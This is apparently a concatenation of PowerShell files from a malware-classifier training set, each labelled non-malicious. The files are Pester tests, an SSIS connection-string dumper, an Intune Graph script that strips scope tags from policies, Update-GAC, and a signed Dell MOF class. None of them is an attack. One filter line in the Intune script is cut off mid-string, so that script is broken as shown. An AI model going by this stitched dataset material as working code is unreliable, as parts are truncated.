$creds = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "admin", $securePassword
function Get-Credential { return $creds }
Describe "hdinsight-hadoop-use-pig-powershell" {
It "Runs a Pig query using Start-AzHDInsightJob" {
Mock Read-Host { $clusterName }
(Start-PigJob $clusterName $creds)[-1].StartsWith("(TRACE,816)") | Should be True
}
}
|
combined_dataset/train/non-malicious/2553.ps1
|
2553.ps1
|
function log([System.String] $text){write-host $text;}
function logException{
log "Logging current exception.";
log $Error[0].Exception;
}
function mytrycatch ([System.Management.Automation.ScriptBlock] $try,
[System.Management.Automation.ScriptBlock] $catch,
[System.Management.Automation.ScriptBlock] $finally = $({})){
$ErrorActionPreference = "Stop";
trap [System.Exception]{
logException;
& $catch;
& $finally
return $false;
}
& $try;
& $finally
return $true;
}
cls
mytrycatch {
gi filethatdoesnotexist;
write-host "You won't hit me."
} {
Write-Host "Caught the exception";
}
$Packages = @();
$Packages = Get-Item -Path "C:\Users\MMessano\Documents\Visual Studio 2008\Projects\Data Management\Management\BillingReport\BillingReport\*.dtsx";
foreach ($package in $Packages )
{
$DTSXPackage = Get-ISPackage -path $package
$DTSXPackage.Name
foreach ($connection in $DTSXPackage.Connections)
{
$connection.Name
$connection.ConnectionString
}
}
|
combined_dataset/train/non-malicious/3078.ps1
|
3078.ps1
|
$scriptRoot = Split-Path $MyInvocation.MyCommand.Path
. $scriptRoot\Validator.ps1 -Verbose
Describe "Testing a validator" {
It "calls MyValidator" {
Mock MyValidator -MockWith { return $true }
Invoke-SomethingThatUsesMyValidator "test"
$was_called_once = 1
Assert-MockCalled MyValidator $was_called_once
}
}
Describe "MyValidator" {
It "passes things that start with the letter S" {
$result = MyValidator "summer"
$result | Should -Be $true
}
It "does not pass a param that does not start with S" {
$result = MyValidator "bummer"
$result | Should -Be $false
}
}
|
combined_dataset/train/non-malicious/85.ps1
|
85.ps1
|
function Get-AuthToken {
[cmdletbinding()]
param
(
[Parameter(Mandatory=$true)]
$User
)
$userUpn = New-Object "System.Net.Mail.MailAddress" -ArgumentList $User
$tenant = $userUpn.Host
Write-Host "Checking for AzureAD module..."
$AadModule = Get-Module -Name "AzureAD" -ListAvailable
if ($AadModule -eq $null) {
Write-Host "AzureAD PowerShell module not found, looking for AzureADPreview"
$AadModule = Get-Module -Name "AzureADPreview" -ListAvailable
}
if ($AadModule -eq $null) {
write-host
write-host "AzureAD Powershell module not installed..." -f Red
write-host "Install by running 'Install-Module AzureAD' or 'Install-Module AzureADPreview' from an elevated PowerShell prompt" -f Yellow
write-host "Script can't continue..." -f Red
write-host
exit
}
if($AadModule.count -gt 1){
$Latest_Version = ($AadModule | select version | Sort-Object)[-1]
$aadModule = $AadModule | ? { $_.version -eq $Latest_Version.version }
if($AadModule.count -gt 1){
$aadModule = $AadModule | select -Unique
}
$adal = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.dll"
$adalforms = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.Platform.dll"
}
else {
$adal = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.dll"
$adalforms = Join-Path $AadModule.ModuleBase "Microsoft.IdentityModel.Clients.ActiveDirectory.Platform.dll"
}
[System.Reflection.Assembly]::LoadFrom($adal) | Out-Null
[System.Reflection.Assembly]::LoadFrom($adalforms) | Out-Null
$clientId = "d1ddf0e4-d672-4dae-b554-9d5bdfd93547"
$redirectUri = "urn:ietf:wg:oauth:2.0:oob"
$resourceAppIdURI = "https://graph.microsoft.com"
$authority = "https://login.microsoftonline.com/$Tenant"
try {
$authContext = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.AuthenticationContext" -ArgumentList $authority
$platformParameters = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.PlatformParameters" -ArgumentList "Auto"
$userId = New-Object "Microsoft.IdentityModel.Clients.ActiveDirectory.UserIdentifier" -ArgumentList ($User, "OptionalDisplayableId")
$authResult = $authContext.AcquireTokenAsync($resourceAppIdURI,$clientId,$redirectUri,$platformParameters,$userId).Result
if($authResult.AccessToken){
$authHeader = @{
'Content-Type'='application/json'
'Authorization'="Bearer " + $authResult.AccessToken
'ExpiresOn'=$authResult.ExpiresOn
}
return $authHeader
}
else {
Write-Host
Write-Host "Authorization Access Token is null, please re-run authentication..." -ForegroundColor Red
Write-Host
break
}
}
catch {
write-host $_.Exception.Message -f Red
write-host $_.Exception.ItemName -f Red
write-host
break
}
}
Function Get-DeviceCompliancePolicy(){
[cmdletbinding()]
param
(
$Name,
[switch]$Android,
[switch]$iOS,
[switch]$Win10,
$id
)
$graphApiVersion = "Beta"
$Resource = "deviceManagement/deviceCompliancePolicies"
try {
$Count_Params = 0
if($Android.IsPresent){ $Count_Params++ }
if($iOS.IsPresent){ $Count_Params++ }
if($Win10.IsPresent){ $Count_Params++ }
if($Name.IsPresent){ $Count_Params++ }
if($Count_Params -gt 1){
write-host "Multiple parameters set, specify a single parameter -Android -iOS or -Win10 against the function" -f Red
}
elseif($Android){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value | Where-Object { ($_.'@odata.type').contains("android") }
}
elseif($iOS){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value | Where-Object { ($_.'@odata.type').contains("ios") }
}
elseif($Win10){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value | Where-Object { ($_.'@odata.type').contains("windows10CompliancePolicy") }
}
elseif($Name){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value | Where-Object { ($_.'displayName').contains("$Name") }
}
elseif($id){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)/$id`?`$expand=assignments,scheduledActionsForRule(`$expand=scheduledActionConfigurations)"
Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get
}
else {
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value
}
}
catch {
$ex = $_.Exception
$errorResponse = $ex.Response.GetResponseStream()
$reader = New-Object System.IO.StreamReader($errorResponse)
$reader.BaseStream.Position = 0
$reader.DiscardBufferedData()
$responseBody = $reader.ReadToEnd();
Write-Host "Response content:`n$responseBody" -f Red
Write-Error "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription)"
write-host
break
}
}
Function Get-DeviceConfigurationPolicy(){
[cmdletbinding()]
param
(
$name,
$id
)
$graphApiVersion = "Beta"
$DCP_resource = "deviceManagement/deviceConfigurations"
try {
if($Name){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($DCP_resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value | Where-Object { ($_.'displayName').contains("$Name") }
}
elseif($id){
$uri = "https://graph.microsoft.com/$graphApiVersion/$($DCP_resource)/$id"
Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get
}
else {
$uri = "https://graph.microsoft.com/$graphApiVersion/$($DCP_resource)"
(Invoke-RestMethod -Uri $uri -Headers $authToken -Method Get).Value
}
}
catch {
$ex = $_.Exception
$errorResponse = $ex.Response.GetResponseStream()
$reader = New-Object System.IO.StreamReader($errorResponse)
$reader.BaseStream.Position = 0
$reader.DiscardBufferedData()
$responseBody = $reader.ReadToEnd();
Write-Host "Response content:`n$responseBody" -f Red
Write-Error "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription)"
write-host
break
}
}
Function Update-DeviceCompliancePolicy(){
[cmdletbinding()]
param
(
[Parameter(Mandatory=$true)]
$id,
[Parameter(Mandatory=$true)]
$Type,
[Parameter(Mandatory=$true)]
$ScopeTags
)
$graphApiVersion = "beta"
$Resource = "deviceManagement/deviceCompliancePolicies/$id"
try {
if($ScopeTags -eq "" -or $ScopeTags -eq $null){
$JSON = @"
{
"@odata.type": "$Type",
"roleScopeTagIds": []
}
"@
}
else {
$object = New-Object –TypeName PSObject
$object | Add-Member -MemberType NoteProperty -Name '@odata.type' -Value "$Type"
$object | Add-Member -MemberType NoteProperty -Name 'roleScopeTagIds' -Value @($ScopeTags)
$JSON = $object | ConvertTo-Json
}
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)"
Invoke-RestMethod -Uri $uri -Headers $authToken -Method Patch -Body $JSON -ContentType "application/json"
Start-Sleep -Milliseconds 100
}
catch {
Write-Host
$ex = $_.Exception
$errorResponse = $ex.Response.GetResponseStream()
$reader = New-Object System.IO.StreamReader($errorResponse)
$reader.BaseStream.Position = 0
$reader.DiscardBufferedData()
$responseBody = $reader.ReadToEnd();
Write-Host "Response content:`n$responseBody" -f Red
Write-Error "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription)"
write-host
break
}
}
Function Update-DeviceConfigurationPolicy(){
[cmdletbinding()]
param
(
[Parameter(Mandatory=$true)]
$id,
[Parameter(Mandatory=$true)]
$Type,
[Parameter(Mandatory=$true)]
$ScopeTags
)
$graphApiVersion = "beta"
$Resource = "deviceManagement/deviceConfigurations/$id"
try {
if($ScopeTags -eq "" -or $ScopeTags -eq $null){
$JSON = @"
{
"@odata.type": "$Type",
"roleScopeTagIds": []
}
"@
}
else {
$object = New-Object –TypeName PSObject
$object | Add-Member -MemberType NoteProperty -Name '@odata.type' -Value "$Type"
$object | Add-Member -MemberType NoteProperty -Name 'roleScopeTagIds' -Value @($ScopeTags)
$JSON = $object | ConvertTo-Json
}
$uri = "https://graph.microsoft.com/$graphApiVersion/$($Resource)"
Invoke-RestMethod -Uri $uri -Headers $authToken -Method Patch -Body $JSON -ContentType "application/json"
Start-Sleep -Milliseconds 100
}
catch {
Write-Host
$ex = $_.Exception
$errorResponse = $ex.Response.GetResponseStream()
$reader = New-Object System.IO.StreamReader($errorResponse)
$reader.BaseStream.Position = 0
$reader.DiscardBufferedData()
$responseBody = $reader.ReadToEnd();
Write-Host "Response content:`n$responseBody" -f Red
Write-Error "Request to $Uri failed with HTTP Status $($ex.Response.StatusCode) $($ex.Response.StatusDescription)"
write-host
break
}
}
write-host
if($global:authToken){
$DateTime = (Get-Date).ToUniversalTime()
$TokenExpires = ($authToken.ExpiresOn.datetime - $DateTime).Minutes
if($TokenExpires -le 0){
write-host "Authentication Token expired" $TokenExpires "minutes ago" -ForegroundColor Yellow
write-host
if($User -eq $null -or $User -eq ""){
$User = Read-Host -Prompt "Please specify your user principal name for Azure Authentication"
Write-Host
}
$global:authToken = Get-AuthToken -User $User
}
}
else {
if($User -eq $null -or $User -eq ""){
$User = Read-Host -Prompt "Please specify your user principal name for Azure Authentication"
Write-Host
}
$global:authToken = Get-AuthToken -User $User
}
Write-Host "Are you sure you want to remove all Scope Tags from all Configuration and Compliance Policies? Y or N?"
$Confirm = read-host
if($Confirm -eq "y" -or $Confirm -eq "Y"){
Write-Host
Write-Host "Device Compliance Policies" -ForegroundColor Cyan
Write-Host "Setting all Device Compliance Policies back to no Scope Tag..."
$CPs = Get-DeviceCompliancePolicy | Sort-Object displayName
if($CPs){
foreach($Policy in $CPs){
$PolicyDN = $Policy.displayName
$Result = Update-DeviceCompliancePolicy -id $Policy.id -Type $Policy.'@odata.type' -ScopeTags ""
if($Result -eq ""){
Write-Host "Compliance Policy '$PolicyDN' patched..." -ForegroundColor Gray
}
}
}
Write-Host
Write-Host "Device Configuration Policies" -ForegroundColor Cyan
Write-Host "Setting all Device Configuration Policies back to no Scope Tag..."
$DCPs = Get-DeviceConfigurationPolicy | ? { $_.'@odata.type' -ne "
if($DCPs){
foreach($Policy in $DCPs){
$PolicyDN = $Policy.displayName
$Result = Update-DeviceConfigurationPolicy -id $Policy.id -Type $Policy.'@odata.type' -ScopeTags ""
if($Result -eq ""){
Write-Host "Configuration Policy '$PolicyDN' patched..." -ForegroundColor Gray
}
}
}
}
else {
Write-Host "Removal of all Scope Tags from all Configuration and Compliance Policies was cancelled..." -ForegroundColor Yellow
}
Write-Host
|
combined_dataset/train/non-malicious/Update-GAC.ps1
|
Update-GAC.ps1
|
# author: jeffrey snover
# url: http://blogs.msdn.com/powershell/archive/2008/09/02/speeding-up-powershell-startup-updating-update-gac-ps1.aspx
Set-Alias ngen (Join-Path ([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory()) ngen.exe)
[AppDomain]::CurrentDomain.GetAssemblies() |
sort {Split-path $_.location -leaf} |
%{
$Name = (Split-Path $_.location -leaf)
if ([System.Runtime.InteropServices.RuntimeEnvironment]::FromGlobalAccessCache($_))
{
Write-Host "Already GACed: $Name"
}else
{
Write-Host -ForegroundColor Yellow "NGENing : $Name"
ngen $_.location | %{"`t$_"}
}
}
|
combined_dataset/train/non-malicious/sample_4_28.ps1
|
sample_4_28.ps1
|
[dynamic, provider("dcismprovider"),
Association, Description (
"DCIM_BMServiceAffectsElement is a derivation of CIM_ServiceAffectsElement "
"and represents an association between a Service and the ManagedElements "
"that might be affected by its execution." ) ]
class DCIM_BMServiceAffectsElement : CIM_ServiceAffectsElement
{
[
Description ("The Managed Element that is affected by the Service."),
Key,
Override ("AffectedElement")
]
CIM_ManagedElement REF AffectedElement;
[
Description ("The Service that is affecting the ManagedElement."),
Key,
Override ("AffectingElement")
]
CIM_Service REF AffectingElement;
[
Arraytype ("Indexed"),
Description ("The Service that is affecting the ManagedElement."),
Required,
Valuemap { "0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "0x8000", "0xFFFF" },
Values { "Unknown", "Other", "Exclusive Use", "Performance Impact", "Element Integrity",
"Manages", "Consumes", "Enhances Integrity", "Degrades Integrity", "Enhances Performance",
"Degrades Performance", "DMTF Reserved", "Vendor Reserved" }
]
uint16 ElementEffects[];
};
/* SIG # Begin signature block */
/* MIItDQYJKoZIhvcNAQcCoIIs/jCCLPoCAQExDzANBglghkgBZQMEAgEFADB5Bgor */
/* BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG */
/* KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCA45r/aYYkMXpDd */
/* j+p+FMel+BnGyeI4LFBzQNXT6+dXJ6CCEmMwggXfMIIEx6ADAgECAhBOQOQ3VO3m */
/* jAAAAABR05R/MA0GCSqGSIb3DQEBCwUAMIG+MQswCQYDVQQGEwJVUzEWMBQGA1UE */
/* ChMNRW50cnVzdCwgSW5jLjEoMCYGA1UECxMfU2VlIHd3dy5lbnRydXN0Lm5ldC9s */
/* ZWdhbC10ZXJtczE5MDcGA1UECxMwKGMpIDIwMDkgRW50cnVzdCwgSW5jLiAtIGZv */
/* ciBhdXRob3JpemVkIHVzZSBvbmx5MTIwMAYDVQQDEylFbnRydXN0IFJvb3QgQ2Vy */
/* dGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMjAeFw0yMTA1MDcxNTQzNDVaFw0zMDEx */
/* MDcxNjEzNDVaMGkxCzAJBgNVBAYTAlVTMRYwFAYDVQQKDA1FbnRydXN0LCBJbmMu */
/* MUIwQAYDVQQDDDlFbnRydXN0IENvZGUgU2lnbmluZyBSb290IENlcnRpZmljYXRp */
/* b24gQXV0aG9yaXR5IC0gQ1NCUjEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK */
/* AoICAQCngY/3FEW2YkPy2K7TJV5IT1G/xX2fUBw10dZ+YSqUGW0nRqSmGl33VFFq */
/* gCLGqGZ1TVSDyV5oG6v2W2Swra0gvVTvRmttAudFrnX2joq5Mi6LuHccUk15iF+l */
/* OhjJUCyXJy2/2gB9Y3/vMuxGh2Pbmp/DWiE2e/mb1cqgbnIs/OHxnnBNCFYVb5Cr */
/* +0i6udfBgniFZS5/tcnA4hS3NxFBBuKK4Kj25X62eAUBw2DtTwdBLgoTSeOQm3/d */
/* vfqsv2RR0VybtPVc51z/O5uloBrXfQmywrf/bhy8yH3m6Sv8crMU6UpVEoScRCV1 */
/* HfYq8E+lID1oJethl3wP5bY9867DwRG8G47M4EcwXkIAhnHjWKwGymUfe5SmS1dn */
/* DH5erXhnW1XjXuvH2OxMbobL89z4n4eqclgSD32m+PhCOTs8LOQyTUmM4OEAwjig */
/* nPqEPkHcblauxhpb9GdoBQHNG7+uh7ydU/Yu6LZr5JnexU+HWKjSZR7IH9Vybu5Z */
/* HFc7CXKd18q3kMbNe0WSkUIDTH0/yvKquMIOhvMQn0YupGaGaFpoGHApOBGAYGuK */
/* Q6NzbOOzazf/5p1nAZKG3y9I0ftQYNVc/iHTAUJj/u9wtBfAj6ju08FLXxLq/f0u */
/* DodEYOOp9MIYo+P9zgyEIg3zp3jak/PbOM+5LzPG/wc8Xr5F0wIDAQABo4IBKzCC */
/* AScwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0lBBYw */
/* FAYIKwYBBQUHAwMGCCsGAQUFBwMIMDsGA1UdIAQ0MDIwMAYEVR0gADAoMCYGCCsG */
/* AQUFBwIBFhpodHRwOi8vd3d3LmVudHJ1c3QubmV0L3JwYTAzBggrBgEFBQcBAQQn */
/* MCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDAGA1UdHwQp */
/* MCcwJaAjoCGGH2h0dHA6Ly9jcmwuZW50cnVzdC5uZXQvZzJjYS5jcmwwHQYDVR0O */
/* BBYEFIK61j2Xzp/PceiSN6/9s7VpNVfPMB8GA1UdIwQYMBaAFGpyJnrQHu995ztp */
/* UdRsjZ+QEmarMA0GCSqGSIb3DQEBCwUAA4IBAQAfXkEEtoNwJFMsVXMdZTrA7LR7 */
/* BJheWTgTCaRZlEJeUL9PbG4lIJCTWEAN9Rm0Yu4kXsIBWBUCHRAJb6jU+5J+Nzg+ */
/* LxR9jx1DNmSzZhNfFMylcfdbIUvGl77clfxwfREc0yHd0CQ5KcX+Chqlz3t57jpv */
/* 3ty/6RHdFoMI0yyNf02oFHkvBWFSOOtg8xRofcuyiq3AlFzkJg4sit1Gw87kVlHF */
/* VuOFuE2bRXKLB/GK+0m4X9HyloFdaVIk8Qgj0tYjD+uL136LwZNr+vFie1jpUJuX */
/* bheIDeHGQ5jXgWG2hZ1H7LGerj8gO0Od2KIc4NR8CMKvdgb4YmZ6tvf6yK81MIIG */
/* CDCCA/CgAwIBAgIQBu9mzEaGqLK0hNoZKy1rYTANBgkqhkiG9w0BAQ0FADBPMQsw */
/* CQYDVQQGEwJVUzEWMBQGA1UEChMNRW50cnVzdCwgSW5jLjEoMCYGA1UEAxMfRW50 */
/* cnVzdCBDb2RlIFNpZ25pbmcgQ0EgLSBPVkNTMjAeFw0yNDA0MTkwOTE2MDlaFw0y */
/* NTA1MTIwOTE2MDhaMIGEMQswCQYDVQQGEwJVUzEOMAwGA1UECBMFVGV4YXMxEzAR */
/* BgNVBAcTClJvdW5kIFJvY2sxEjAQBgNVBAoTCURlbGwgSW5jLjEoMCYGA1UECxMf */
/* U2VydmVyIFN5c3RlbXMgTWdtdCBFbmdpbmVlcmluZzESMBAGA1UEAxMJRGVsbCBJ */
/* bmMuMIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAvFatHoJS1lbvBD4U */
/* x/jt6hrhOHlGpntV/TPJbKwAdvG6SCT6MfdFasEGShyzypfx8adv3v+sFWo84yYB */
/* GqnqH/Kkj48BTKNREXjN3x/jLZrv+rVRQJYG79us7u3vQVSBX0ds0Jcd9f7u2REE */
/* aLBKrd7ZwxmsHoiAaqKYBm8nMo4kmH4xOw6cOXxUW6mkYxNQxn60nxV5A2ZJvUKn */
/* YvanuULo5jGrl+t2A5jInOLyxSmNU62DdLbyhtE3B6cEhe5yQ54hi7d6c5IM2fNH */
/* FNrQkRavAWUyAxPPBpTSsR0g/IkNymbNPCTjgvDQOIJBcMp0C+q158RIBiE+IMwq */
/* QGi7aUvUUhzTQG9NcSDQan3hMmYfevU3RLQMw4OcoGIT/jOSYmgtcLHiB6lnOG/h */
/* iJ8EsQgW1s2yJ7vG2Fo/IHvQjbfFxefO+gluw4UjcLZgIqACIlFNYGaq4rzKtTeF */
/* 1NNy6DjjbJV2nt/JlD68YlFg0pU9rGDKglZFWvfWiLId8IJnAgMBAAGjggEoMIIB */
/* JDAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRFrXrMchlvXUnwqKV0rQOPRSgzqzAf */
/* BgNVHSMEGDAWgBTvn7p5sHPyJR54nANSnBtThN6N7TBnBggrBgEFBQcBAQRbMFkw */
/* IwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDIGCCsGAQUFBzAC */
/* hiZodHRwOi8vYWlhLmVudHJ1c3QubmV0L292Y3MyLWNoYWluLnA3YzAxBgNVHR8E */
/* KjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3QubmV0L292Y3MyLmNybDAOBgNV */
/* HQ8BAf8EBAMCB4AwEwYDVR0lBAwwCgYIKwYBBQUHAwMwEwYDVR0gBAwwCjAIBgZn */
/* gQwBBAEwDQYJKoZIhvcNAQENBQADggIBACoeAWs2aV9gf+TF4AGOKc454/E55mVR */
/* Yz42M1ksqASl2j+ulObFIWcuy/paLjWhMSulehEA8Zb+YQ89fR6Y0TgJ0Eh09aK5 */
/* +GARB7q/+a+gRIw7nfrwmjMkXAwL+9lmbc1X64fEUuKY2NVdksjKC7xRKNMb5i50 */
/* NQyVN9neCJKIVSQDiBMXGgtDkAqPe1sH7/NGGQZKCXhIg3f3caq7dr/mZoiVAIOB */
/* XtHr++65DqG61aWyZV5tCfzSvXFvLpL0dbu14gH6gEo5Zvlp226Vk+HKr/cQ2Ynj */
/* /xXw/5UWHvmKwDOAkA/ld64jA4m466aoP2tKse8z1kSa/zw1wRSp0bwPn23gj2IO */
/* NmEG9dM9Lv3c5FH+oBKNuqJ2Vj5viCHVZEcw40UDQqdfboVK+Y1XSkNfa1CUjzCu */
/* Q2J3XMrfVK9ZCecopoCAXzYem7e/G/Md3rTQky2PTf7Z1hgYlqxisPoGEV3nguIg */
/* ooMbBkHbl/4iWAB237woZFlX0imdO5se7el67/nx58CSLYjNmj82Y4cthnFOrwP4 */
/* mUW7zVXlq9sZP9fCcrdrNMUF4KYS2x7/IIgHURKvOTjyT6f+ZRedEfwOlM1D12/l */
/* eL1OX+dPZq5BGGHal3r1xbLdLxHUlMg+IJJk0wmMwmSF3kzbqbMUTaM1FX9x0+E8 */
/* 4YVlsJB1ttLHMIIGcDCCBFigAwIBAgIQce9VdK81VMNaLGn2b0trzTANBgkqhkiG */
/* 9w0BAQ0FADBpMQswCQYDVQQGEwJVUzEWMBQGA1UECgwNRW50cnVzdCwgSW5jLjFC */
/* MEAGA1UEAww5RW50cnVzdCBDb2RlIFNpZ25pbmcgUm9vdCBDZXJ0aWZpY2F0aW9u */
/* IEF1dGhvcml0eSAtIENTQlIxMB4XDTIxMDUwNzE5MjA0NVoXDTQwMTIyOTIzNTkw */
/* MFowTzELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUVudHJ1c3QsIEluYy4xKDAmBgNV */
/* BAMTH0VudHJ1c3QgQ29kZSBTaWduaW5nIENBIC0gT1ZDUzIwggIiMA0GCSqGSIb3 */
/* DQEBAQUAA4ICDwAwggIKAoICAQCemXYXGp5WFwhjLJNNg2GEMzQCttlioN7CDrkg */
/* TMhXnQ/dVFsNDNYB3S9I4ZEJ4dvIFQSCtnvw2NYwOxlxcPuoppf2KV2kDKn0Uz5X */
/* 2wxObvx2218k6apfQ+OT5w7PyiW8xEwwC1oP5gb05W4MmWZYT4NhwnN8XCJvAUXF */
/* D/dAT2RL0BcKqQ4eAi+hj0zyZ1DbPuSfwk8/dOsxpNCU0Jm8MJIJasskzaLYdlLQ */
/* TnWYT2Ra0l6D9FjAXWp1xNg/ZDqLFA3YduHquWvnEXBJEThjE27xxvq9EEU1B+Z2 */
/* FdB1FqrCQ1f+q/5jc0YioLjz5MdwRgn5qTdBmrNLbB9wcqMH9jWSdBFkbvkC1cCS */
/* lfGXWX4N7qIl8nFVuJuNv83urt37DOeuMk5QjaHf0XO/wc5/ddqrv9CtgjjF54jt */
/* om06hhG317DhqIs7DEEXml/kW5jInQCf93PSw+mfBYd5IYPWC+3RzAif4PHFyVi6 */
/* U1/Uh7GLWajSXs1p0D76xDkJr7S17ec8+iKH1nP5F5Vqwxz1VXhf1PoLwFs/jHgV */
/* DlpMOm7lJpjQJ8wg38CGO3qNZUZ+2WFeqfSuPtT8r0XHOrOFBEqLyAlds3sCKFnj */
/* hn2AolhAZmLgOFWDq58pQSa6u+nYZPi2uyhzzRVK155z42ZMsVGdgSOLyIZ3srYs */
/* NyJwIQIDAQABo4IBLDCCASgwEgYDVR0TAQH/BAgwBgEB/wIBADAdBgNVHQ4EFgQU */
/* 75+6ebBz8iUeeJwDUpwbU4Teje0wHwYDVR0jBBgwFoAUgrrWPZfOn89x6JI3r/2z */
/* tWk1V88wMwYIKwYBBQUHAQEEJzAlMCMGCCsGAQUFBzABhhdodHRwOi8vb2NzcC5l */
/* bnRydXN0Lm5ldDAxBgNVHR8EKjAoMCagJKAihiBodHRwOi8vY3JsLmVudHJ1c3Qu */
/* bmV0L2NzYnIxLmNybDAOBgNVHQ8BAf8EBAMCAYYwEwYDVR0lBAwwCgYIKwYBBQUH */
/* AwMwRQYDVR0gBD4wPDAwBgRVHSAAMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly93d3cu */
/* ZW50cnVzdC5uZXQvcnBhMAgGBmeBDAEEATANBgkqhkiG9w0BAQ0FAAOCAgEAXvOG */
/* mTXBee7wEK/XkkPShdBb4Jig4HFRyRTLUJpgDrAEJkmxz+m6mwih2kNd1G8jorn4 */
/* QMdH/k0BC0iQP8jcarQ+UzUovkBKR4VqHndAzIB/YbQ8T3mo5qOmoH5EhnG/EhuV */
/* gXL3DaXQ3mefxqK48Wr5/P50ZsZk5nk9agNhTksfzCBiywIY7GPtfnE/lroLXmgi */
/* Z+wfwNIFFmaxsqTq/MWVo40SpfWN7xsgzZn35zLzWXEf3ZTmeeVSIxBWKvxZOL+/ */
/* eSWSasf9q2d3cbEEfTWtFME+qPwjF1YIGHzXeiJrkWrMNUVtTzudQ50FuJ3z/DQh */
/* XAQYMlc4NMHKgyNGpogjIcZ+FICrse+7C6wJP+5TkTGz4lREqrV9MDwsI5zoP6NY */
/* 6kAIF6MgX3rADNuq/wMWAw10ZCKalF4wNXYT9dPh4+AHytnqRYhGnFTVEOLzMglA */
/* tudcFzL+zK/rbc9gPHXz7lxgQFUbtVmvciNoTZx0BAwQya9QW6cNZg+W5ZqV4CCi */
/* GtCw7jhJnipnnpGWbJjbxBBtYHwebkjntn6vMwcSce+9lTu+qYPUQn23pzTXX4aR */
/* ta9WWNpVfRe927zNZEEVjTFRBk+0LrKLPZzzTeNYA1TMrIj4UjxOS0YJJRn/Feen */
/* mEYufbrq4+N8//m5GZW+drkNebICURpKyJ+IwkMxghoAMIIZ/AIBATBjME8xCzAJ */
/* BgNVBAYTAlVTMRYwFAYDVQQKEw1FbnRydXN0LCBJbmMuMSgwJgYDVQQDEx9FbnRy */
/* dXN0IENvZGUgU2lnbmluZyBDQSAtIE9WQ1MyAhAG72bMRoaosrSE2hkrLWthMA0G */
/* CWCGSAFlAwQCAQUAoIGsMBkGCSqGSIb3DQEJAzEMBgorBgEEAYI3AgEEMBwGCisG */
/* AQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMC8GCSqGSIb3DQEJBDEiBCCpf4VOwPoU */
/* VS77JDY5uMG1kZggFpxyF77HXsiglUwLTTBABgorBgEEAYI3AgEMMTIwMKAWgBQA */
/* RABlAGwAbAAsACAASQBuAGMALqEWgBRodHRwOi8vd3d3LmRlbGwuY29tIDANBgkq */
/* hkiG9w0BAQEFAASCAYAi76mVJogZQtibECJ08a+TfrbL6BT5jXwh76a7b8Gre4l1 */
/* TacZjPXZA/r7hmCGSKQudzgo4UzkGvQ84j3f6A62S8Vh03ubru/vb/iM3JGp4J7A */
/* b8smsu0IuZSv2GIyM/msCSmVrPIIP7ckL5umF8qkY1wF6rgG9a35X9N5QnMFAQMW */
/* idMDF5zLV6dPgbYFPI5rebK1HVl+wdm9ETK+anYUXCwXd24JzJUNFu9QEgzmAS4J */
/* luNoKTjQyBn5GryWgZm+jp4dtDhZNqLHPF/UfARzBPWTQF3MZnCgNIa+TaMi5JY2 */
/* cbDCi4KQFes6d6qmW2dxZqZay0A1F3Qx3z/qBonCenpI9Ao49LWzHQn/mdwynq6m */
/* BKS3+r4K6uV8z4TXMA6LPFnPE07NgYJdiv5q3ncYlKOrB5Mk00jmyPkxM1l0O0hB */
/* IfzDD7V28MizrVa/g7tTcOcNvQ1HSG0AemeXsLI1FSduPCROGgLHBBxJlQjlzM2D */
/* YeLZp6Zr/bHg2yB1yqOhghc/MIIXOwYKKwYBBAGCNwMDATGCFyswghcnBgkqhkiG */
/* 9w0BBwKgghcYMIIXFAIBAzEPMA0GCWCGSAFlAwQCAQUAMHcGCyqGSIb3DQEJEAEE */
/* oGgEZjBkAgEBBglghkgBhv1sBwEwMTANBglghkgBZQMEAgEFAAQglcmv+CrBDfVk */
/* S/x1yCeygTQW87A2mlpmNtC+cxjFRzYCEAHt4AoMAivyhm/QApVsEtUYDzIwMjQw */
/* OTIwMDcwMDI1WqCCEwkwggbCMIIEqqADAgECAhAFRK/zlJ0IOaa/2z9f5WEWMA0G */
